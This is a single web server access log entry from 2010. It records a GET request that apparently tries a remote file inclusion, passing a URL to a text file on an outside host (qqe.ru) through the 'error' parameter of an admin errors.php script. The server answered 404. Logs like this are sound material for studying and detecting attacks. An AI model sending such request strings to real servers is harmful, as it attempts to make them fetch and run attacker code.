80.172.236.41 - - [11/Feb/2010:06:37:40 -0800] "GET /logs/access_100107.log%20%20//admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
